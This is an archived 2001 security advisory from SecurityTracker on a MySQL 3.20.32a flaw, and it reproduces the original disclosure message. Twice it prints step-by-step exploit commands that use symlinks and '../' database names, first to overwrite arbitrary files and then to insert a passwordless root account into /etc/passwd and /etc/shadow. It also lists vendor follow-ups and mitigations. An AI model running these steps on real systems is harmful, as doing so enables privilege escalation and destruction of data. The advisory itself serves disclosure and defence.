SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   MySQL Vendors:   MySQL.com
MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
SecurityTracker Alert ID:  1001118
SecurityTracker URL:  http://securitytracker.com/id/1001118
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 19 2001
Impact:   Denial of service via local system, Modification of user information, User access via local system
Exploit Included:  Yes  
Version(s): mysql-3.20.32a
Description:   It is reported that any local MySQL user can exploit MySQL to write files on the server with the privileges assigned to the MySQL server (which may be root-level privileges in some cases). This can be used to gain additional access on the server.

MySQL reportedly accepts "../blah-blah" as a valid database name and table name (which is represented by 3 files: tablename.ISD, tablename.ISM and tablename.frm). However, when MySQL determines if the table name already exists or not, it only checks "tablename.frm".

Some demonstration exploit steps were provided in the original source message to ...

1) Overwrite any file:

$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.

2) To obtain root-level privileges (if MySQL daemon is run as root)

$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$

Impact:   An authorized local user can use MySQL to write files to the server in a denial of service attempt or in an attempt to obtain additional privileges. If the MySQL daemon is run as root, then the user can obtain root-level privileges.
Solution:   No solution was available at the time of this entry. The author of the original source report makes several recommendations: 1) Patch MySQL to check all tablename files
2) Patch MySQL to treat database names beginning with ".." as invalid database names.
3) Do not run the MySQL daemon as root.

Vendor URL:  mysql.com (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (FreeBSD), UNIX (Solaris - SunOS), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
The vendor notes that this vulnerability was corrected over a year ago. Version 3.23.x does not contain this bug.
Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
This is a follow-up message. A user reports that this vulnerabiltiy applies to mysql 3.23.32 [which is contrary to what the vendor has noted in a previous message].
(Vendor Fix Released) Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
The vendor has issued release 3.23.36 to correct several security issues.



 Source Message Contents

Subject:  potential vulnerability of mysqld running with root privileges


Anybody, who get login and password to mysql can use it as DoS or r00t
exploit because mysql accepts '../blah-blah' as valid database name and
each table represented by 3 files tablename.ISD, tablename.ISM and
tablename.frm, But, when mysqld checks table already exists or not
exists, it checks _only_ tablename.frm :

Usage this "vulnerable features of mysql" to make big DoS (Will
Overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.

Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!

Recomendations:
* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as incorrect
database names.
* And Main recomendation - do not run mysqld as root!!!

Patches:
 not yet

Workaround:
chowns existing database tables to a normal user and run mysqld as this
unprivileged user - it will be better solution!.

Vulnerable versions:
This DoS/exploit tested on mysql-3.20.32a but i see another versions of
mysql also vulnerabile.

Comments:
Mysql dox recomends dont run mysqld as root, but People from RedHat
didnt read mysql dox - mysql istalled from rpm is vulnerable.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC